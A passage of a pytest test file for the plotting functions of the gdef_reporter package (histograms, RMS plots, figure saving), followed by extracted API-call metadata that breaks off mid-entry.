    def test_plot_z_histogram_to_ax__defaults_multiple(self, multiple_data_test_cases):
        # check default behaviour of parameters title, n_bins, units and add_norm
        fig1, ax1 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
        if isinstance(multiple_data_test_cases, dict):
            # A dict that mixes np.ndarray entries (no length scale) with scaled data
            # objects must be rejected with an AssertionError.
            # BUG FIX: the walrus expression needs its own parentheses; without them
            # `_list := len(...) > 0` binds the *bool* of the comparison, so the
            # subsequent `_list < len(...)` compared True/False against an int
            # (PEP 572 operator precedence).
            if (_list := len([data for data in multiple_data_test_cases.values()
                              if isinstance(data, np.ndarray)])) > 0 \
                    and _list < len(multiple_data_test_cases):
                with pytest.raises(AssertionError):
                    plot_z_histogram_to_ax(ax1, multiple_data_test_cases)
                return
        plot_z_histogram_to_ax(ax1, multiple_data_test_cases, title="")
        auto_show(fig1)
        assert len(ax1.lines) == 0  # no Gauss fit (expected default behaviour)
        if len(multiple_data_test_cases) == 1:
            assert ax1.get_title().startswith("\u03BC=")  # default title for one data set shows mu=...
        else:
            assert ax1.get_title() == ""  # no default title if no data or more than one dataset
        assert ax1.get_xlabel() == "z [\u03BCm]"  # default units should be µm; note: µ == \u03BC is False!
        for container in ax1.containers:
            assert len(container.patches) == 200  # default n_bins should be 200

    def test_plot_z_histogram_to_ax__set_parameters(self, data_test_cases):
        # first, check setting a title, selecting units µm, set n_bins and draw normal distribution fit
        fig1, ax1 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
        title = "Use [µm] and Gauss fit"
        n_bins = 20
        plot_z_histogram_to_ax(ax1, data_test_cases, n_bins=n_bins, units="nm", title=title, add_norm=True)
        auto_show(fig1)
        assert len(ax1.lines) == 1  # Gauss fit (add_norm=True)
        assert ax1.get_title() == title
        assert str(ax1.get_xlabel()) == str(f"z [nm]")  # note: comparison between µ and \u03BC is False!
        assert len(ax1.containers[0]) == n_bins  # explicit n_bins overrides the default of 200
        # second, check no title via title=None
        fig2, ax2 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
        title = None
        plot_z_histogram_to_ax(ax2, data_test_cases, n_bins=20, units="µm", title=title)
        auto_show(fig2)
        assert ax2.get_title() == ""  # expected for title=None

    def test_plot_z_histogram_to_ax__multiple(self, multiple_data_test_cases):
        # several data sets plotted into one histogram axes, with Gauss fits
        fig1, ax1 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
        pixel_width = None
        if isinstance(multiple_data_test_cases, dict):
            pixel_width = 0.5e-6  # np.ndarray entries need an explicit length scale
        plot_z_histogram_to_ax(ax1, multiple_data_test_cases, pixel_width=pixel_width, title="", add_norm=True)
        auto_show(fig1)
        assert isinstance(fig1, Figure)
        assert len(fig1.axes[0].containers) == len(multiple_data_test_cases)
        assert len(fig1.axes[0].lines) == len(multiple_data_test_cases)  # Gauss fits (add_norm=True)

    def test_create_z_histogram_plot__defaults(self, data_test_cases):
        # check setting figure_size and dpi and also default of parameters title, n_bins, units and add_norm
        fig1 = create_z_histogram_plot(data_test_cases)
        auto_show(fig1)
        assert type(fig1) is Figure
        assert len(fig1.axes[0].lines) == 0  # no Gauss fit (expected default behaviour)
        assert fig1.axes[0].get_title().startswith("\u03BC=")  # default title starts with mu=...
        assert fig1.axes[0].get_xlabel() == "z [\u03BCm]"  # default units should be µm; note: µ == \u03BC is False!
        assert len(fig1.axes[0].containers[0]) == 200  # default n_bins should be 200

    def test_create_z_histogram_plot__set_paramaters(self, data_test_cases):
        # first, check setting label, a title, selecting units µm, set n_bins and draw normal distribution fit
        labels = type(data_test_cases).__name__
        title = "Use [nm] and Gauss fit"
        n_bins = 20
        plotter_style = get_plotter_style_histogram(ORIGINAL_DPI, ORIGINAL_FIGURE_SIZE)
        fig1 = create_z_histogram_plot(data_test_cases, labels, n_bins=n_bins, title=title, units="nm", add_norm=True,
                                       plotter_style=plotter_style)
        auto_show(fig1)
        assert len(fig1.axes[0].lines) == 1  # Gauss fit (add_norm=True)
        assert np.any(fig1.get_size_inches() == ORIGINAL_FIGURE_SIZE)
        assert fig1.dpi == ORIGINAL_DPI
        assert fig1._suptitle.get_text() == title  # title lands in the figure suptitle ...
        assert fig1.axes[0].get_title() == ""  # ... not in the axes title
        assert str(fig1.axes[0].get_xlabel()) == str(f"z [nm]")  # note: comparison between µ and \u03BC is False!
        assert len(fig1.axes[0].containers[0]) == n_bins  # explicit n_bins overrides the default of 200
        # second, check no title via title=None
        fig2 = create_z_histogram_plot(data_test_cases, title=None)
        auto_show(fig2)
        assert fig2._suptitle is None
        assert fig2.axes[0].get_title() == ""

    def test_create_z_histogram_plot__multiple(self, multiple_data_test_cases):
        # list input gets one generated label per data set; dict input uses its keys
        labels = None
        pixel_width = 0.5e-6
        if isinstance(multiple_data_test_cases, list):
            labels = []
            for i, data in enumerate(multiple_data_test_cases):
                labels.append(f"{i} - {type(data).__name__}")
        fig1 = create_z_histogram_plot(multiple_data_test_cases, pixel_width=pixel_width, labels=labels, title="",
                                       add_norm=True)
        auto_show(fig1)
        assert len(fig1.axes[0].containers) == len(multiple_data_test_cases)
        assert len(fig1.axes[0].lines) == len(multiple_data_test_cases)  # Gauss fits (add_norm=True)
class Test1DPlotRMS:
    """Tests for the 1D RMS-roughness plot helper create_rms_plot()."""

    def test_plot_rms_to_ax(self):
        pass  # TODO: plot_rms_to_ax() is not covered yet

    def test_create_rms_plot__default(self, data_test_cases):
        fig = create_rms_plot(data_test_cases)
        assert isinstance(fig, Figure)
        if isinstance(data_test_cases, np.ndarray):
            assert fig.axes[0].get_xlabel() == "x [px]"  # no length scale -> pixel axis
        else:
            assert fig.axes[0].get_xlabel() == "x [\u03BCm]"
        assert fig.axes[0].legend_ is None  # no labels given -> no legend
        auto_show(fig)

    def test_create_rms_plot__set_parameters(self, data_test_cases):
        pixel_width = 0.5e-9  # define a length scale for np.ndarray
        labels = f"{type(data_test_cases).__name__}"
        fig = create_rms_plot(data_test_cases, label_list=labels, pixel_width=pixel_width, moving_average_n=1,
                              subtract_average=True, x_units="nm")
        assert isinstance(fig, Figure)
        assert fig.axes[0].get_xlabel() == "x [nm]"
        assert fig.axes[0].legend_ is not None
        auto_show(fig)

    def test_create_rms_plot__multiple_default(self, multiple_data_test_cases):
        if isinstance(multiple_data_test_cases, dict):
            # A dict that mixes np.ndarray entries (no length scale) with scaled data
            # objects must be rejected with an AssertionError.
            # BUG FIX: the walrus expression needs its own parentheses; without them
            # `_list := len(...) > 0` binds the *bool* of the comparison instead of
            # the count (PEP 572 operator precedence).
            if (_list := len([data for data in multiple_data_test_cases.values()
                              if isinstance(data, np.ndarray)])) > 0 \
                    and _list < len(multiple_data_test_cases):
                with pytest.raises(AssertionError):
                    create_rms_plot(multiple_data_test_cases)
                return
        fig = create_rms_plot(multiple_data_test_cases)
        assert len(multiple_data_test_cases) == len(fig.axes[0].lines)
        auto_show(fig)

    def test_create_rms_plot__multiple_set_parameter(self, multiple_data_test_cases):
        labels = None
        pixel_width = 0.5e-6
        title = type(multiple_data_test_cases).__name__
        if isinstance(multiple_data_test_cases, list):
            labels = [f"{type(data).__name__}" for data in multiple_data_test_cases]
        fig = create_rms_plot(multiple_data_test_cases, label_list=labels, pixel_width=pixel_width, moving_average_n=1,
                              subtract_average=False, x_units="nm", title=title)
        assert fig.axes[0].legend_ is not None or len(multiple_data_test_cases) == 0
        assert len(multiple_data_test_cases) == len(fig.axes[0].lines)
        assert fig.axes[0].get_xlabel() == "x [nm]"
        auto_show(fig)
class Test1DPlotRMSWithError:
    """Tests for create_rms_with_error_plot()."""

    def test_create_rms_with_error_plot(self, data_test_cases):
        fig = create_rms_with_error_plot(data_test_cases)
        if isinstance(data_test_cases, np.ndarray):
            assert fig.axes[0].get_xlabel() == "x [px]"  # no length scale -> pixel axis
        else:
            assert fig.axes[0].get_xlabel() == "x [\u03BCm]"
        auto_show(fig)

    def test_create_rms_with_error_plot__multiple(self, multiple_data_test_cases):
        pixel_width = None
        if isinstance(multiple_data_test_cases, dict):
            # A dict that mixes np.ndarray entries (no length scale) with scaled data
            # objects must be rejected with an AssertionError.
            # BUG FIX: the walrus expression needs its own parentheses; without them
            # `_list := len(...) > 0` binds the *bool* of the comparison instead of
            # the count (PEP 572 operator precedence).
            if (_list := len([data for data in multiple_data_test_cases.values()
                              if isinstance(data, np.ndarray)])) > 0 \
                    and _list < len(multiple_data_test_cases):
                with pytest.raises(AssertionError):
                    create_rms_with_error_plot(multiple_data_test_cases)
            pixel_width = 0.5e-6  # setting a pixel_width, np.ndarray has a length scale -> no AssertionError
        fig = create_rms_with_error_plot(multiple_data_test_cases, pixel_width=pixel_width)
        assert fig.axes[0].get_xlabel() == "x [\u03BCm]"
        auto_show(fig)
class TestSummaryPlot:
    """Smoke test for create_summary_plot()."""

    def test_create_summary_plot(self, multiple_data_test_cases):
        # A summary over all supplied data sets should come back as a single Figure.
        title = f"{type(multiple_data_test_cases).__name__}"
        summary_fig = create_summary_plot(multiple_data_test_cases, pixel_width=0.5e-6, title=title)
        assert isinstance(summary_fig, Figure)
        auto_show(summary_fig)
class TestSpecialFunctions:
    """Tests for _extract_ndarray_and_pixel_width() and save_figure()."""

    def test_extract_ndarray_and_pixel_width(self, data_test_cases):
        pixel_width = 1
        ndarray2d, px_width = _extract_ndarray_and_pixel_width(data_test_cases, pixel_width=pixel_width)
        assert type(ndarray2d) is np.ndarray
        if isinstance(data_test_cases, np.ndarray):
            # plain arrays are passed through together with the given pixel_width
            assert np.all(data_test_cases == ndarray2d)
            assert px_width == pixel_width
        else:
            # wrapped data objects provide both the values and their own pixel_width
            assert np.all(data_test_cases.values == ndarray2d)
            assert data_test_cases.pixel_width == px_width

    def test_save_figure(self, tmp_path):
        fig, _ = plt.subplots(1, 1, dpi=72, figsize=(1, 1), constrained_layout=True)
        # BUG FIX: the expected paths below have to be rebuilt from the current
        # *filename* in every phase; they previously used a fixed literal, so all
        # four phases checked the same (wrong) file and the assertions contradicted
        # each other.
        # first try saving in existing folder with default settings
        assert tmp_path.exists()
        filename = "default"
        save_figure(fig, tmp_path, filename)
        png_file = tmp_path / f"{filename}.png"  # should be saved by default
        pdf_file = tmp_path / f"{filename}.pdf"  # should not be saved by default
        assert png_file.exists()
        assert not pdf_file.exists()
        # second, save nothing:
        filename = "save_nothing"
        save_figure(fig, tmp_path, filename, png=False, pdf=False)
        png_file = tmp_path / f"{filename}.png"
        pdf_file = tmp_path / f"{filename}.pdf"
        assert not png_file.exists()
        assert not pdf_file.exists()
        # third, only save pdf
        filename = "save_pdf"
        save_figure(fig, tmp_path, filename, png=False, pdf=True)
        png_file = tmp_path / f"{filename}.png"
        pdf_file = tmp_path / f"{filename}.pdf"
        assert not png_file.exists()
        assert pdf_file.exists()
        # fourth, use folder that does not exist yet and save both png and pdf
        new_tmp_path = tmp_path / "new/"
        assert not new_tmp_path.exists()
        filename = "save_pdf_and_png"
        save_figure(fig, new_tmp_path, filename, png=True, pdf=True)
        png_file = new_tmp_path / f"{filename}.png"
        pdf_file = new_tmp_path / f"{filename}.pdf"
        assert png_file.exists()
        assert pdf_file.exists()
| [
"gdef_reporter.plotter_utils.save_figure",
"gdef_reporter.plotter_utils.create_summary_plot",
"gdef_reporter.plotter_styles.get_plotter_style_histogram",
"gdef_reporter.plotter_utils.create_z_histogram_plot",
"gdef_reporter.plotter_utils.create_rms_plot",
"gdef_reporter.plotter_utils.plot_to_ax",
"gdef_... | [((759, 825), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)\n', (771, 825), True, 'import matplotlib.pyplot as plt\n'), ((834, 883), 'gdef_reporter.plotter_utils.plot_to_ax', 'plot_to_ax', (['ax1', 'data_test_cases'], {'pixel_width': '(1.0)'}), '(ax1, data_test_cases, pixel_width=1.0)\n', (844, 883), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((1055, 1121), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)\n', (1067, 1121), True, 'import matplotlib.pyplot as plt\n'), ((1235, 1305), 'gdef_reporter.plotter_utils.plot_to_ax', 'plot_to_ax', (['ax2', 'data_test_cases'], {'pixel_width': 'pixel_width', 'title': 'title'}), '(ax2, data_test_cases, pixel_width=pixel_width, title=title)\n', (1245, 1305), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((1391, 1457), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)\n', (1403, 1457), True, 'import matplotlib.pyplot as plt\n'), ((1576, 1651), 'gdef_reporter.plotter_utils.plot_to_ax', 'plot_to_ax', (['ax3', 'data_test_cases'], {'pixel_width': '(5.0)', 'z_unit': '"""µm"""', 'title': 'title'}), "(ax3, data_test_cases, pixel_width=5.0, z_unit='µm', title=title)\n", (1586, 1651), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, 
plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((1794, 1905), 'gdef_reporter.plotter_utils.create_plot', 'create_plot', (['data_test_cases', '(1e-06)', '"""default value for cropped (True)"""', 'ORIGINAL_FIGURE_SIZE', 'ORIGINAL_DPI'], {}), "(data_test_cases, 1e-06, 'default value for cropped (True)',\n ORIGINAL_FIGURE_SIZE, ORIGINAL_DPI)\n", (1805, 1905), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((2120, 2230), 'gdef_reporter.plotter_utils.create_plot', 'create_plot', (['data_test_cases', '(1e-06)', '"""cropped=False"""'], {'max_figure_size': 'ORIGINAL_FIGURE_SIZE', 'cropped': '(False)'}), "(data_test_cases, 1e-06, 'cropped=False', max_figure_size=\n ORIGINAL_FIGURE_SIZE, cropped=False)\n", (2131, 2230), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((2530, 2625), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (2542, 2625), True, 'import matplotlib.pyplot as plt\n'), ((2630, 2684), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'data_test_cases'], {'title': '""""""'}), "(ax1, data_test_cases, title='')\n", (2652, 2684), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, 
create_summary_plot\n'), ((3264, 3359), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (3276, 3359), True, 'import matplotlib.pyplot as plt\n'), ((3754, 3817), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'multiple_data_test_cases'], {'title': '""""""'}), "(ax1, multiple_data_test_cases, title='')\n", (3776, 3817), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((4618, 4713), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (4630, 4713), True, 'import matplotlib.pyplot as plt\n'), ((4779, 4882), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'data_test_cases'], {'n_bins': 'n_bins', 'units': '"""nm"""', 'title': 'title', 'add_norm': '(True)'}), "(ax1, data_test_cases, n_bins=n_bins, units='nm',\n title=title, add_norm=True)\n", (4801, 4882), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((5262, 5357), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (5274, 5357), True, 'import matplotlib.pyplot as plt\n'), ((5383, 5468), 
'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax2', 'data_test_cases'], {'n_bins': '(20)', 'units': '"""µm"""', 'title': 'title'}), "(ax2, data_test_cases, n_bins=20, units='µm', title=title\n )\n", (5405, 5468), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((5652, 5747), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (5664, 5747), True, 'import matplotlib.pyplot as plt\n'), ((5868, 5976), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'multiple_data_test_cases'], {'pixel_width': 'pixel_width', 'title': '""""""', 'add_norm': '(True)'}), "(ax1, multiple_data_test_cases, pixel_width=\n pixel_width, title='', add_norm=True)\n", (5890, 5976), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((6412, 6452), 'gdef_reporter.plotter_utils.create_z_histogram_plot', 'create_z_histogram_plot', (['data_test_cases'], {}), '(data_test_cases)\n', (6435, 6452), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((7226, 7289), 'gdef_reporter.plotter_styles.get_plotter_style_histogram', 'get_plotter_style_histogram', (['ORIGINAL_DPI', 'ORIGINAL_FIGURE_SIZE'], {}), '(ORIGINAL_DPI, ORIGINAL_FIGURE_SIZE)\n', (7253, 7289), False, 'from 
gdef_reporter.plotter_styles import get_plotter_style_histogram\n'), ((7305, 7441), 'gdef_reporter.plotter_utils.create_z_histogram_plot', 'create_z_histogram_plot', (['data_test_cases', 'labels'], {'n_bins': 'n_bins', 'title': 'title', 'units': '"""nm"""', 'add_norm': '(True)', 'plotter_style': 'plotter_style'}), "(data_test_cases, labels, n_bins=n_bins, title=title,\n units='nm', add_norm=True, plotter_style=plotter_style)\n", (7328, 7441), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((8048, 8100), 'gdef_reporter.plotter_utils.create_z_histogram_plot', 'create_z_histogram_plot', (['data_test_cases'], {'title': 'None'}), '(data_test_cases, title=None)\n', (8071, 8100), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((8562, 8680), 'gdef_reporter.plotter_utils.create_z_histogram_plot', 'create_z_histogram_plot', (['multiple_data_test_cases'], {'pixel_width': 'pixel_width', 'labels': 'labels', 'title': '""""""', 'add_norm': '(True)'}), "(multiple_data_test_cases, pixel_width=pixel_width,\n labels=labels, title='', add_norm=True)\n", (8585, 8680), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((9067, 9099), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['data_test_cases'], {}), '(data_test_cases)\n', (9082, 9099), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, 
save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((9594, 9731), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['data_test_cases'], {'label_list': 'labels', 'pixel_width': 'pixel_width', 'moving_average_n': '(1)', 'subtract_average': '(True)', 'x_units': '"""nm"""'}), "(data_test_cases, label_list=labels, pixel_width=pixel_width,\n moving_average_n=1, subtract_average=True, x_units='nm')\n", (9609, 9731), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((10391, 10432), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['multiple_data_test_cases'], {}), '(multiple_data_test_cases)\n', (10406, 10432), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((10875, 11040), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['multiple_data_test_cases'], {'label_list': 'labels', 'pixel_width': 'pixel_width', 'moving_average_n': '(1)', 'subtract_average': '(False)', 'x_units': '"""nm"""', 'title': 'title'}), "(multiple_data_test_cases, label_list=labels, pixel_width=\n pixel_width, moving_average_n=1, subtract_average=False, x_units='nm',\n title=title)\n", (10890, 11040), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((11403, 11446), 'gdef_reporter.plotter_utils.create_rms_with_error_plot', 'create_rms_with_error_plot', (['data_test_cases'], {}), '(data_test_cases)\n', (11429, 11446), False, 'from gdef_reporter.plotter_utils 
import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((12257, 12334), 'gdef_reporter.plotter_utils.create_rms_with_error_plot', 'create_rms_with_error_plot', (['multiple_data_test_cases'], {'pixel_width': 'pixel_width'}), '(multiple_data_test_cases, pixel_width=pixel_width)\n', (12283, 12334), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((12610, 12697), 'gdef_reporter.plotter_utils.create_summary_plot', 'create_summary_plot', (['multiple_data_test_cases'], {'pixel_width': 'pixel_width', 'title': 'title'}), '(multiple_data_test_cases, pixel_width=pixel_width,\n title=title)\n', (12629, 12697), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((12909, 12983), 'gdef_reporter.plotter_utils._extract_ndarray_and_pixel_width', '_extract_ndarray_and_pixel_width', (['data_test_cases'], {'pixel_width': 'pixel_width'}), '(data_test_cases, pixel_width=pixel_width)\n', (12941, 12983), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((13376, 13443), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': '(72)', 'figsize': '(1, 1)', 'constrained_layout': '(True)'}), '(1, 1, dpi=72, figsize=(1, 1), constrained_layout=True)\n', (13388, 13443), True, 'import matplotlib.pyplot as plt\n'), ((13583, 13619), 'gdef_reporter.plotter_utils.save_figure', 
'save_figure', (['fig', 'tmp_path', 'filename'], {}), '(fig, tmp_path, filename)\n', (13594, 13619), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((13925, 13983), 'gdef_reporter.plotter_utils.save_figure', 'save_figure', (['fig', 'tmp_path', 'filename'], {'png': '(False)', 'pdf': '(False)'}), '(fig, tmp_path, filename, png=False, pdf=False)\n', (13936, 13983), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((14288, 14345), 'gdef_reporter.plotter_utils.save_figure', 'save_figure', (['fig', 'tmp_path', 'filename'], {'png': '(False)', 'pdf': '(True)'}), '(fig, tmp_path, filename, png=False, pdf=True)\n', (14299, 14345), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((14784, 14844), 'gdef_reporter.plotter_utils.save_figure', 'save_figure', (['fig', 'new_tmp_path', 'filename'], {'png': '(True)', 'pdf': '(True)'}), '(fig, new_tmp_path, filename, png=True, pdf=True)\n', (14795, 14844), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((13100, 13136), 'numpy.all', 'np.all', (['(data_test_cases == ndarray2d)'], {}), '(data_test_cases == ndarray2d)\n', (13106, 13136), True, 'import numpy as np\n'), ((13213, 13256), 'numpy.all', 'np.all', (['(data_test_cases.values == ndarray2d)'], {}), '(data_test_cases.values == 
ndarray2d)\n', (13219, 13256), True, 'import numpy as np\n'), ((2045, 2063), 'numpy.all', 'np.all', (['comparison'], {}), '(comparison)\n', (2051, 2063), True, 'import numpy as np\n'), ((3617, 3646), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (3630, 3646), False, 'import pytest\n'), ((3668, 3721), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'multiple_data_test_cases'], {}), '(ax1, multiple_data_test_cases)\n', (3690, 3721), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((10260, 10289), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (10273, 10289), False, 'import pytest\n'), ((10311, 10352), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['multiple_data_test_cases'], {}), '(multiple_data_test_cases)\n', (10326, 10352), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((12024, 12053), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (12037, 12053), False, 'import pytest\n'), ((12075, 12127), 'gdef_reporter.plotter_utils.create_rms_with_error_plot', 'create_rms_with_error_plot', (['multiple_data_test_cases'], {}), 